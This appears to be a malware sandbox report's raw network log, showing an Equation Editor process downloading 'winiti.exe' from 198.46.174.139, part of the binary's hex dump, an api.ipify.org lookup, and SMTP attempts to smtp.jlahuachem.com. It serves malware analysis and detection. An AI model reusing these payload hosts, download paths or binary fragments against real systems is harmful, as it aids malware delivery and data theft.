                                                            Jul 26, 2024 06:39:09.501924038 CEST8049163198.46.174.139192.168.2.22
                                                            Jul 26, 2024 06:39:09.501930952 CEST4916380192.168.2.22198.46.174.139
                                                            Jul 26, 2024 06:39:09.501960039 CEST8049163198.46.174.139192.168.2.22
                                                            Jul 26, 2024 06:39:09.501970053 CEST4916380192.168.2.22198.46.174.139
                                                            Jul 26, 2024 06:39:09.502091885 CEST4916380192.168.2.22198.46.174.139
                                                            Jul 26, 2024 06:39:09.502810001 CEST8049163198.46.174.139192.168.2.22
                                                            Jul 26, 2024 06:39:09.502845049 CEST8049163198.46.174.139192.168.2.22
                                                            Jul 26, 2024 06:39:09.502862930 CEST4916380192.168.2.22198.46.174.139
                                                            Jul 26, 2024 06:39:09.502878904 CEST8049163198.46.174.139192.168.2.22
                                                            Jul 26, 2024 06:39:09.502890110 CEST4916380192.168.2.22198.46.174.139
                                                            Jul 26, 2024 06:39:09.502912998 CEST8049163198.46.174.139192.168.2.22
                                                            Jul 26, 2024 06:39:09.502919912 CEST4916380192.168.2.22198.46.174.139
                                                            Jul 26, 2024 06:39:09.502953053 CEST4916380192.168.2.22198.46.174.139
                                                            Jul 26, 2024 06:39:09.503012896 CEST8049163198.46.174.139192.168.2.22
                                                            Jul 26, 2024 06:39:09.503046036 CEST8049163198.46.174.139192.168.2.22
                                                            Jul 26, 2024 06:39:09.503065109 CEST4916380192.168.2.22198.46.174.139
                                                            Jul 26, 2024 06:39:09.503079891 CEST8049163198.46.174.139192.168.2.22
                                                            Jul 26, 2024 06:39:09.503089905 CEST4916380192.168.2.22198.46.174.139
                                                            Jul 26, 2024 06:39:09.503120899 CEST4916380192.168.2.22198.46.174.139
                                                            Jul 26, 2024 06:39:09.503798008 CEST8049163198.46.174.139192.168.2.22
                                                            Jul 26, 2024 06:39:09.503833055 CEST8049163198.46.174.139192.168.2.22
                                                            Jul 26, 2024 06:39:09.503850937 CEST4916380192.168.2.22198.46.174.139
                                                            Jul 26, 2024 06:39:09.503865004 CEST8049163198.46.174.139192.168.2.22
                                                            Jul 26, 2024 06:39:09.503875971 CEST4916380192.168.2.22198.46.174.139
                                                            Jul 26, 2024 06:39:09.503900051 CEST8049163198.46.174.139192.168.2.22
                                                            Jul 26, 2024 06:39:09.503911018 CEST4916380192.168.2.22198.46.174.139
                                                            Jul 26, 2024 06:39:09.503936052 CEST8049163198.46.174.139192.168.2.22
                                                            Jul 26, 2024 06:39:09.503943920 CEST4916380192.168.2.22198.46.174.139
                                                            Jul 26, 2024 06:39:09.503971100 CEST8049163198.46.174.139192.168.2.22
                                                            Jul 26, 2024 06:39:09.503974915 CEST4916380192.168.2.22198.46.174.139
                                                            Jul 26, 2024 06:39:09.504010916 CEST4916380192.168.2.22198.46.174.139
                                                            Jul 26, 2024 06:39:09.504703999 CEST8049163198.46.174.139192.168.2.22
                                                            Jul 26, 2024 06:39:09.504738092 CEST8049163198.46.174.139192.168.2.22
                                                            Jul 26, 2024 06:39:09.504755974 CEST4916380192.168.2.22198.46.174.139
                                                            Jul 26, 2024 06:39:09.504770994 CEST8049163198.46.174.139192.168.2.22
                                                            Jul 26, 2024 06:39:09.504780054 CEST4916380192.168.2.22198.46.174.139
                                                            Jul 26, 2024 06:39:09.504805088 CEST8049163198.46.174.139192.168.2.22
                                                            Jul 26, 2024 06:39:09.504808903 CEST4916380192.168.2.22198.46.174.139
                                                            Jul 26, 2024 06:39:09.504837990 CEST8049163198.46.174.139192.168.2.22
                                                            Jul 26, 2024 06:39:09.504841089 CEST4916380192.168.2.22198.46.174.139
                                                            Jul 26, 2024 06:39:09.504872084 CEST8049163198.46.174.139192.168.2.22
                                                            Jul 26, 2024 06:39:09.504877090 CEST4916380192.168.2.22198.46.174.139
                                                            Jul 26, 2024 06:39:09.504905939 CEST8049163198.46.174.139192.168.2.22
                                                            Jul 26, 2024 06:39:09.504906893 CEST4916380192.168.2.22198.46.174.139
                                                            Jul 26, 2024 06:39:09.504946947 CEST4916380192.168.2.22198.46.174.139
                                                            Jul 26, 2024 06:39:09.505789042 CEST8049163198.46.174.139192.168.2.22
                                                            Jul 26, 2024 06:39:09.505821943 CEST8049163198.46.174.139192.168.2.22
                                                            Jul 26, 2024 06:39:09.505846024 CEST4916380192.168.2.22198.46.174.139
                                                            Jul 26, 2024 06:39:09.505875111 CEST4916380192.168.2.22198.46.174.139
                                                            Jul 26, 2024 06:39:09.505944967 CEST8049163198.46.174.139192.168.2.22
                                                            Jul 26, 2024 06:39:09.505979061 CEST8049163198.46.174.139192.168.2.22
                                                            Jul 26, 2024 06:39:09.506002903 CEST4916380192.168.2.22198.46.174.139
                                                            Jul 26, 2024 06:39:09.506012917 CEST8049163198.46.174.139192.168.2.22
                                                            Jul 26, 2024 06:39:09.506022930 CEST4916380192.168.2.22198.46.174.139
                                                            Jul 26, 2024 06:39:09.506048918 CEST8049163198.46.174.139192.168.2.22
                                                            Jul 26, 2024 06:39:09.506066084 CEST4916380192.168.2.22198.46.174.139
                                                            Jul 26, 2024 06:39:09.506082058 CEST8049163198.46.174.139192.168.2.22
                                                            Jul 26, 2024 06:39:09.506088972 CEST4916380192.168.2.22198.46.174.139
                                                            Jul 26, 2024 06:39:09.506134987 CEST4916380192.168.2.22198.46.174.139
                                                            Jul 26, 2024 06:39:09.506634951 CEST8049163198.46.174.139192.168.2.22
                                                            Jul 26, 2024 06:39:09.506669998 CEST8049163198.46.174.139192.168.2.22
                                                            Jul 26, 2024 06:39:09.506690025 CEST4916380192.168.2.22198.46.174.139
                                                            Jul 26, 2024 06:39:09.506701946 CEST8049163198.46.174.139192.168.2.22
                                                            Jul 26, 2024 06:39:09.506722927 CEST4916380192.168.2.22198.46.174.139
                                                            Jul 26, 2024 06:39:09.506736040 CEST8049163198.46.174.139192.168.2.22
                                                            Jul 26, 2024 06:39:09.506742001 CEST4916380192.168.2.22198.46.174.139
                                                            Jul 26, 2024 06:39:09.506769896 CEST8049163198.46.174.139192.168.2.22
                                                            Jul 26, 2024 06:39:09.506782055 CEST4916380192.168.2.22198.46.174.139
                                                            Jul 26, 2024 06:39:09.506802082 CEST8049163198.46.174.139192.168.2.22
                                                            Jul 26, 2024 06:39:09.506805897 CEST4916380192.168.2.22198.46.174.139
                                                            Jul 26, 2024 06:39:09.506843090 CEST4916380192.168.2.22198.46.174.139
                                                            Jul 26, 2024 06:39:09.507482052 CEST8049163198.46.174.139192.168.2.22
                                                            Jul 26, 2024 06:39:09.507524014 CEST8049163198.46.174.139192.168.2.22
                                                            Jul 26, 2024 06:39:09.507539034 CEST4916380192.168.2.22198.46.174.139
                                                            Jul 26, 2024 06:39:09.507575035 CEST8049163198.46.174.139192.168.2.22
                                                            Jul 26, 2024 06:39:09.507577896 CEST4916380192.168.2.22198.46.174.139
                                                            Jul 26, 2024 06:39:09.507621050 CEST4916380192.168.2.22198.46.174.139
                                                            Jul 26, 2024 06:39:09.507625103 CEST8049163198.46.174.139192.168.2.22
                                                            Jul 26, 2024 06:39:09.507654905 CEST8049163198.46.174.139192.168.2.22
                                                            Jul 26, 2024 06:39:09.507673979 CEST4916380192.168.2.22198.46.174.139
                                                            Jul 26, 2024 06:39:09.507687092 CEST8049163198.46.174.139192.168.2.22
                                                            Jul 26, 2024 06:39:09.507693052 CEST4916380192.168.2.22198.46.174.139
                                                            Jul 26, 2024 06:39:09.507720947 CEST8049163198.46.174.139192.168.2.22
                                                            Jul 26, 2024 06:39:09.507731915 CEST4916380192.168.2.22198.46.174.139
                                                            Jul 26, 2024 06:39:09.507755041 CEST8049163198.46.174.139192.168.2.22
                                                            Jul 26, 2024 06:39:09.507766962 CEST4916380192.168.2.22198.46.174.139
                                                            Jul 26, 2024 06:39:09.507788897 CEST8049163198.46.174.139192.168.2.22
                                                            Jul 26, 2024 06:39:09.507797003 CEST4916380192.168.2.22198.46.174.139
                                                            Jul 26, 2024 06:39:09.507823944 CEST8049163198.46.174.139192.168.2.22
                                                            Jul 26, 2024 06:39:09.507832050 CEST4916380192.168.2.22198.46.174.139
                                                            Jul 26, 2024 06:39:09.507857084 CEST8049163198.46.174.139192.168.2.22
                                                            Jul 26, 2024 06:39:09.507872105 CEST4916380192.168.2.22198.46.174.139
                                                            Jul 26, 2024 06:39:09.507890940 CEST8049163198.46.174.139192.168.2.22
                                                            Jul 26, 2024 06:39:09.507896900 CEST4916380192.168.2.22198.46.174.139
                                                            Jul 26, 2024 06:39:09.507925034 CEST8049163198.46.174.139192.168.2.22
                                                            Jul 26, 2024 06:39:09.507930994 CEST4916380192.168.2.22198.46.174.139
                                                            Jul 26, 2024 06:39:09.507960081 CEST8049163198.46.174.139192.168.2.22
                                                            Jul 26, 2024 06:39:09.507962942 CEST4916380192.168.2.22198.46.174.139
                                                            Jul 26, 2024 06:39:09.507993937 CEST8049163198.46.174.139192.168.2.22
                                                            Jul 26, 2024 06:39:09.508002043 CEST4916380192.168.2.22198.46.174.139
                                                            Jul 26, 2024 06:39:09.508025885 CEST8049163198.46.174.139192.168.2.22
                                                            Jul 26, 2024 06:39:09.508030891 CEST4916380192.168.2.22198.46.174.139
                                                            Jul 26, 2024 06:39:09.508060932 CEST8049163198.46.174.139192.168.2.22
                                                            Jul 26, 2024 06:39:09.508064985 CEST4916380192.168.2.22198.46.174.139
                                                            Jul 26, 2024 06:39:09.508093119 CEST8049163198.46.174.139192.168.2.22
                                                            Jul 26, 2024 06:39:09.508097887 CEST4916380192.168.2.22198.46.174.139
                                                            Jul 26, 2024 06:39:09.508126020 CEST8049163198.46.174.139192.168.2.22
                                                            Jul 26, 2024 06:39:09.508130074 CEST4916380192.168.2.22198.46.174.139
                                                            Jul 26, 2024 06:39:09.508160114 CEST8049163198.46.174.139192.168.2.22
                                                            Jul 26, 2024 06:39:09.508162975 CEST4916380192.168.2.22198.46.174.139
                                                            Jul 26, 2024 06:39:09.508193016 CEST8049163198.46.174.139192.168.2.22
                                                            Jul 26, 2024 06:39:09.508198977 CEST4916380192.168.2.22198.46.174.139
                                                            Jul 26, 2024 06:39:09.508233070 CEST4916380192.168.2.22198.46.174.139
                                                            Jul 26, 2024 06:39:09.510211945 CEST8049163198.46.174.139192.168.2.22
                                                            Jul 26, 2024 06:39:09.510246038 CEST8049163198.46.174.139192.168.2.22
                                                            Jul 26, 2024 06:39:09.510276079 CEST4916380192.168.2.22198.46.174.139
                                                            Jul 26, 2024 06:39:09.510297060 CEST8049163198.46.174.139192.168.2.22
                                                            Jul 26, 2024 06:39:09.510303020 CEST4916380192.168.2.22198.46.174.139
                                                            Jul 26, 2024 06:39:09.510330915 CEST8049163198.46.174.139192.168.2.22
                                                            Jul 26, 2024 06:39:09.510339022 CEST4916380192.168.2.22198.46.174.139
                                                            Jul 26, 2024 06:39:09.510364056 CEST8049163198.46.174.139192.168.2.22
                                                            Jul 26, 2024 06:39:09.510376930 CEST4916380192.168.2.22198.46.174.139
                                                            Jul 26, 2024 06:39:09.510409117 CEST4916380192.168.2.22198.46.174.139
                                                            Jul 26, 2024 06:39:09.510483980 CEST8049163198.46.174.139192.168.2.22
                                                            Jul 26, 2024 06:39:09.510515928 CEST8049163198.46.174.139192.168.2.22
                                                            Jul 26, 2024 06:39:09.510538101 CEST4916380192.168.2.22198.46.174.139
                                                            Jul 26, 2024 06:39:09.510550022 CEST8049163198.46.174.139192.168.2.22
                                                            Jul 26, 2024 06:39:09.510567904 CEST4916380192.168.2.22198.46.174.139
                                                            Jul 26, 2024 06:39:09.510591984 CEST4916380192.168.2.22198.46.174.139
                                                            Jul 26, 2024 06:39:09.511184931 CEST8049163198.46.174.139192.168.2.22
                                                            Jul 26, 2024 06:39:09.511218071 CEST8049163198.46.174.139192.168.2.22
                                                            Jul 26, 2024 06:39:09.511240005 CEST4916380192.168.2.22198.46.174.139
                                                            Jul 26, 2024 06:39:09.511250973 CEST8049163198.46.174.139192.168.2.22
                                                            Jul 26, 2024 06:39:09.511266947 CEST4916380192.168.2.22198.46.174.139
                                                            Jul 26, 2024 06:39:09.511296034 CEST4916380192.168.2.22198.46.174.139
                                                            Jul 26, 2024 06:39:09.511338949 CEST8049163198.46.174.139192.168.2.22
                                                            Jul 26, 2024 06:39:09.511370897 CEST8049163198.46.174.139192.168.2.22
                                                            Jul 26, 2024 06:39:09.511383057 CEST4916380192.168.2.22198.46.174.139
                                                            Jul 26, 2024 06:39:09.511404991 CEST8049163198.46.174.139192.168.2.22
                                                            Jul 26, 2024 06:39:09.511437893 CEST8049163198.46.174.139192.168.2.22
                                                            Jul 26, 2024 06:39:09.511454105 CEST4916380192.168.2.22198.46.174.139
                                                            Jul 26, 2024 06:39:09.511470079 CEST8049163198.46.174.139192.168.2.22
                                                            Jul 26, 2024 06:39:09.511476040 CEST4916380192.168.2.22198.46.174.139
                                                            Jul 26, 2024 06:39:09.511512041 CEST4916380192.168.2.22198.46.174.139
                                                            Jul 26, 2024 06:39:09.512140036 CEST8049163198.46.174.139192.168.2.22
                                                            Jul 26, 2024 06:39:09.512173891 CEST8049163198.46.174.139192.168.2.22
                                                            Jul 26, 2024 06:39:09.512195110 CEST4916380192.168.2.22198.46.174.139
                                                            Jul 26, 2024 06:39:09.512221098 CEST4916380192.168.2.22198.46.174.139
                                                            Jul 26, 2024 06:39:09.512305975 CEST8049163198.46.174.139192.168.2.22
                                                            Jul 26, 2024 06:39:09.512337923 CEST8049163198.46.174.139192.168.2.22
                                                            Jul 26, 2024 06:39:09.512357950 CEST4916380192.168.2.22198.46.174.139
                                                            Jul 26, 2024 06:39:09.512371063 CEST8049163198.46.174.139192.168.2.22
                                                            Jul 26, 2024 06:39:09.512381077 CEST4916380192.168.2.22198.46.174.139
                                                            Jul 26, 2024 06:39:09.512404919 CEST8049163198.46.174.139192.168.2.22
                                                            Jul 26, 2024 06:39:09.512417078 CEST4916380192.168.2.22198.46.174.139
                                                            Jul 26, 2024 06:39:09.512438059 CEST4916380192.168.2.22198.46.174.139
                                                            Jul 26, 2024 06:39:09.512456894 CEST8049163198.46.174.139192.168.2.22
                                                            Jul 26, 2024 06:39:09.512510061 CEST8049163198.46.174.139192.168.2.22
                                                            Jul 26, 2024 06:39:09.512512922 CEST4916380192.168.2.22198.46.174.139
                                                            Jul 26, 2024 06:39:09.512542963 CEST8049163198.46.174.139192.168.2.22
                                                            Jul 26, 2024 06:39:09.512557983 CEST4916380192.168.2.22198.46.174.139
                                                            Jul 26, 2024 06:39:09.512576103 CEST8049163198.46.174.139192.168.2.22
                                                            Jul 26, 2024 06:39:09.512583971 CEST4916380192.168.2.22198.46.174.139
                                                            Jul 26, 2024 06:39:09.512608051 CEST8049163198.46.174.139192.168.2.22
                                                            Jul 26, 2024 06:39:09.512612104 CEST4916380192.168.2.22198.46.174.139
                                                            Jul 26, 2024 06:39:09.512643099 CEST8049163198.46.174.139192.168.2.22
                                                            Jul 26, 2024 06:39:09.512645960 CEST4916380192.168.2.22198.46.174.139
                                                            Jul 26, 2024 06:39:09.512677908 CEST8049163198.46.174.139192.168.2.22
                                                            Jul 26, 2024 06:39:09.512682915 CEST4916380192.168.2.22198.46.174.139
                                                            Jul 26, 2024 06:39:09.512753963 CEST4916380192.168.2.22198.46.174.139
                                                            Jul 26, 2024 06:39:10.137722015 CEST4916380192.168.2.22198.46.174.139
                                                            Jul 26, 2024 06:39:13.627728939 CEST49164443192.168.2.22172.67.74.152
                                                            Jul 26, 2024 06:39:13.627783060 CEST44349164172.67.74.152192.168.2.22
                                                            Jul 26, 2024 06:39:13.627835035 CEST49164443192.168.2.22172.67.74.152
                                                            Jul 26, 2024 06:39:13.633869886 CEST49164443192.168.2.22172.67.74.152
                                                            Jul 26, 2024 06:39:13.633893967 CEST44349164172.67.74.152192.168.2.22
                                                            Jul 26, 2024 06:39:14.141546965 CEST44349164172.67.74.152192.168.2.22
                                                            Jul 26, 2024 06:39:14.141609907 CEST49164443192.168.2.22172.67.74.152
                                                            Jul 26, 2024 06:39:14.160516977 CEST49164443192.168.2.22172.67.74.152
                                                            Jul 26, 2024 06:39:14.160531044 CEST44349164172.67.74.152192.168.2.22
                                                            Jul 26, 2024 06:39:14.161057949 CEST44349164172.67.74.152192.168.2.22
                                                            Jul 26, 2024 06:39:14.243372917 CEST49164443192.168.2.22172.67.74.152
                                                            Jul 26, 2024 06:39:14.284534931 CEST44349164172.67.74.152192.168.2.22
                                                            Jul 26, 2024 06:39:14.362374067 CEST44349164172.67.74.152192.168.2.22
                                                            Jul 26, 2024 06:39:14.362473965 CEST44349164172.67.74.152192.168.2.22
                                                            Jul 26, 2024 06:39:14.362518072 CEST49164443192.168.2.22172.67.74.152
                                                            Jul 26, 2024 06:39:14.368165970 CEST49164443192.168.2.22172.67.74.152
                                                            Jul 26, 2024 06:39:15.311827898 CEST4916525192.168.2.22208.91.199.224
                                                            Jul 26, 2024 06:39:18.318244934 CEST4916525192.168.2.22208.91.199.224
                                                            Jul 26, 2024 06:39:24.324280024 CEST4916525192.168.2.22208.91.199.224
                                                            Jul 26, 2024 06:39:36.322304010 CEST4916525192.168.2.22208.91.199.225
                                                            Jul 26, 2024 06:39:39.331513882 CEST4916525192.168.2.22208.91.199.225
                                                            Jul 26, 2024 06:39:45.337544918 CEST4916525192.168.2.22208.91.199.225
                                                            Jul 26, 2024 06:39:57.350238085 CEST4916525192.168.2.22208.91.199.223
                                                            Jul 26, 2024 06:40:00.360569000 CEST4916525192.168.2.22208.91.199.223
                                                            Jul 26, 2024 06:40:06.366482019 CEST4916525192.168.2.22208.91.199.223
                                                            Jul 26, 2024 06:40:18.378848076 CEST4916525192.168.2.22208.91.198.143
                                                            Jul 26, 2024 06:40:21.389352083 CEST4916525192.168.2.22208.91.198.143
                                                            Jul 26, 2024 06:40:27.395339012 CEST4916525192.168.2.22208.91.198.143
                                                            TimestampSource PortDest PortSource IPDest IP
                                                            Jul 26, 2024 06:39:13.601883888 CEST5456253192.168.2.228.8.8.8
                                                            Jul 26, 2024 06:39:13.611968040 CEST53545628.8.8.8192.168.2.22
                                                            Jul 26, 2024 06:39:13.612134933 CEST5456253192.168.2.228.8.8.8
                                                            Jul 26, 2024 06:39:13.619060040 CEST53545628.8.8.8192.168.2.22
                                                            Jul 26, 2024 06:39:15.289864063 CEST5291753192.168.2.228.8.8.8
                                                            Jul 26, 2024 06:39:15.299308062 CEST53529178.8.8.8192.168.2.22
                                                            Jul 26, 2024 06:39:15.301516056 CEST6275153192.168.2.228.8.8.8
                                                            Jul 26, 2024 06:39:15.311512947 CEST53627518.8.8.8192.168.2.22
                                                            TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                            Jul 26, 2024 06:39:13.601883888 CEST192.168.2.228.8.8.80x9366Standard query (0)api.ipify.orgA (IP address)IN (0x0001)false
                                                            Jul 26, 2024 06:39:13.612134933 CEST192.168.2.228.8.8.80x9366Standard query (0)api.ipify.orgA (IP address)IN (0x0001)false
                                                            Jul 26, 2024 06:39:15.289864063 CEST192.168.2.228.8.8.80x1521Standard query (0)smtp.jlahuachem.comA (IP address)IN (0x0001)false
                                                            Jul 26, 2024 06:39:15.301516056 CEST192.168.2.228.8.8.80x1675Standard query (0)smtp.jlahuachem.comA (IP address)IN (0x0001)false
                                                            TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                            Jul 26, 2024 06:39:13.611968040 CEST8.8.8.8192.168.2.220x9366No error (0)api.ipify.org172.67.74.152A (IP address)IN (0x0001)false
                                                            Jul 26, 2024 06:39:13.611968040 CEST8.8.8.8192.168.2.220x9366No error (0)api.ipify.org104.26.12.205A (IP address)IN (0x0001)false
                                                            Jul 26, 2024 06:39:13.611968040 CEST8.8.8.8192.168.2.220x9366No error (0)api.ipify.org104.26.13.205A (IP address)IN (0x0001)false
                                                            Jul 26, 2024 06:39:13.619060040 CEST8.8.8.8192.168.2.220x9366No error (0)api.ipify.org172.67.74.152A (IP address)IN (0x0001)false
                                                            Jul 26, 2024 06:39:13.619060040 CEST8.8.8.8192.168.2.220x9366No error (0)api.ipify.org104.26.12.205A (IP address)IN (0x0001)false
                                                            Jul 26, 2024 06:39:13.619060040 CEST8.8.8.8192.168.2.220x9366No error (0)api.ipify.org104.26.13.205A (IP address)IN (0x0001)false
                                                            Jul 26, 2024 06:39:15.299308062 CEST8.8.8.8192.168.2.220x1521No error (0)smtp.jlahuachem.comus2.smtp.mailhostbox.comCNAME (Canonical name)IN (0x0001)false
                                                            Jul 26, 2024 06:39:15.299308062 CEST8.8.8.8192.168.2.220x1521No error (0)us2.smtp.mailhostbox.com208.91.199.224A (IP address)IN (0x0001)false
                                                            Jul 26, 2024 06:39:15.299308062 CEST8.8.8.8192.168.2.220x1521No error (0)us2.smtp.mailhostbox.com208.91.199.225A (IP address)IN (0x0001)false
                                                            Jul 26, 2024 06:39:15.299308062 CEST8.8.8.8192.168.2.220x1521No error (0)us2.smtp.mailhostbox.com208.91.199.223A (IP address)IN (0x0001)false
                                                            Jul 26, 2024 06:39:15.299308062 CEST8.8.8.8192.168.2.220x1521No error (0)us2.smtp.mailhostbox.com208.91.198.143A (IP address)IN (0x0001)false
                                                            Jul 26, 2024 06:39:15.311512947 CEST8.8.8.8192.168.2.220x1675No error (0)smtp.jlahuachem.comus2.smtp.mailhostbox.comCNAME (Canonical name)IN (0x0001)false
                                                            Jul 26, 2024 06:39:15.311512947 CEST8.8.8.8192.168.2.220x1675No error (0)us2.smtp.mailhostbox.com208.91.199.225A (IP address)IN (0x0001)false
                                                            Jul 26, 2024 06:39:15.311512947 CEST8.8.8.8192.168.2.220x1675No error (0)us2.smtp.mailhostbox.com208.91.199.224A (IP address)IN (0x0001)false
                                                            Jul 26, 2024 06:39:15.311512947 CEST8.8.8.8192.168.2.220x1675No error (0)us2.smtp.mailhostbox.com208.91.198.143A (IP address)IN (0x0001)false
                                                            Jul 26, 2024 06:39:15.311512947 CEST8.8.8.8192.168.2.220x1675No error (0)us2.smtp.mailhostbox.com208.91.199.223A (IP address)IN (0x0001)false
                                                            • api.ipify.org
                                                            • 198.46.174.139
                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            0192.168.2.2249163198.46.174.139803244C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                                            TimestampBytes transferredDirectionData
                                                            Jul 26, 2024 06:39:08.334826946 CEST314OUTGET /71/winiti.exe HTTP/1.1
                                                            Accept: */*
                                                            Accept-Encoding: gzip, deflate
                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                                            Host: 198.46.174.139
                                                            Connection: Keep-Alive
                                                            Jul 26, 2024 06:39:08.861911058 CEST1236INHTTP/1.1 200 OK
                                                            Date: Fri, 26 Jul 2024 04:39:08 GMT
                                                            Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.0.30
                                                            Last-Modified: Thu, 25 Jul 2024 06:32:44 GMT
                                                            ETag: "a4000-61e0c90002b33"
                                                            Accept-Ranges: bytes
                                                            Content-Length: 671744
                                                            Keep-Alive: timeout=5, max=100
                                                            Connection: Keep-Alive
                                                            Content-Type: application/x-msdownload
                                                            Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 11 d2 a1 66 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 30 00 00 e0 09 00 00 40 00 00 00 00 00 00 42 fd 09 00 00 20 00 00 00 00 0a 00 00 00 40 00 00 20 00 00 00 20 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 40 0a 00 00 20 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 f0 fc 09 00 4f 00 00 00 00 00 0a 00 e0 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 0a 00 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 [TRUNCATED]
                                                            Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PELf0@B @ @ @O H.textH `.rsrc @@.reloc @B
                                                            Jul 26, 2024 06:39:08.861965895 CEST1236INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                            Data Ascii:
                                                            Jul 26, 2024 06:39:08.862008095 CEST1236INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                            Data Ascii:
                                                            Jul 26, 2024 06:39:08.862147093 CEST1236INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                            Data Ascii:
                                                            Jul 26, 2024 06:39:08.862183094 CEST1236INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                            Data Ascii:
                                                            Jul 26, 2024 06:39:08.862216949 CEST1236INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                            Data Ascii:
                                                            Jul 26, 2024 06:39:08.862253904 CEST1236INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                            Data Ascii:
                                                            Jul 26, 2024 06:39:08.862747908 CEST1236INData Raw: 28 23 00 00 0a 06 6f 24 00 00 0a 02 28 25 00 00 0a 06 6f 26 00 00 0a 02 28 27 00 00 0a 2a 00 00 00 13 30 04 00 83 01 00 00 02 00 00 11 02 17 7d 03 00 00 04 02 03 04 16 28 28 00 00 0a 02 03 04 28 29 00 00 0a 2c 2d 02 16 28 10 00 00 06 02 fe 06 14
                                                            Data Ascii: (#o$(%o&('*0}(((),-(s"(o$(o&*rp[(*o+t[(,@s s-s.o/o#rpo0, (#o#rpo0s_o1o#r+po0
                                                            Jul 26, 2024 06:39:08.862782001 CEST1236INData Raw: 11 07 6f 5a 00 00 0a 74 22 00 00 01 11 06 16 6a 6f 5b 00 00 0a 11 06 6f 57 00 00 0a 11 05 6f 5c 00 00 0a 11 06 6f 5c 00 00 0a 33 47 11 05 16 6a 6f 49 00 00 0a 11 06 16 6a 6f 49 00 00 0a 11 05 6f 5d 00 00 0a 11 05 6f 5c 00 00 0a 2e 10 11 05 6f 5e
                                                            Data Ascii: oZt"jo[oWo\o\3GjoIjoIo]o\.o^o^.o]o\3-o_-,o`,o`oa&**`0a(b({("o#oc{("o%o
                                                            Jul 26, 2024 06:39:08.862818003 CEST1236INData Raw: 00 00 04 72 15 01 00 70 6f 7c 00 00 0a 02 7b 08 00 00 04 20 c8 00 00 00 1f 37 73 7d 00 00 0a 6f 7e 00 00 0a 02 7b 08 00 00 04 1f 17 6f 7f 00 00 0a 02 7b 08 00 00 04 72 25 01 00 70 6f 63 00 00 0a 02 7b 08 00 00 04 17 6f 84 00 00 0a 02 7b 08 00 00
                                                            Data Ascii: rpo|{ 7s}o~{o{r%poc{o{so{ sxoy{szo{{r3po|{ &s}o~{o{o{# sxoy{
                                                            Jul 26, 2024 06:39:08.866990089 CEST1236INData Raw: 00 0a 02 1e 1d 1e 1d 73 7a 00 00 0a 28 8f 00 00 0a 02 72 2d 02 00 70 28 7c 00 00 0a 02 72 2d 02 00 70 6f 63 00 00 0a 02 16 28 90 00 00 0a 02 28 91 00 00 0a 2a 1e 02 28 92 00 00 0a 2a ae 7e 11 00 00 04 2d 1e 72 43 02 00 70 d0 04 00 00 02 28 2a 00
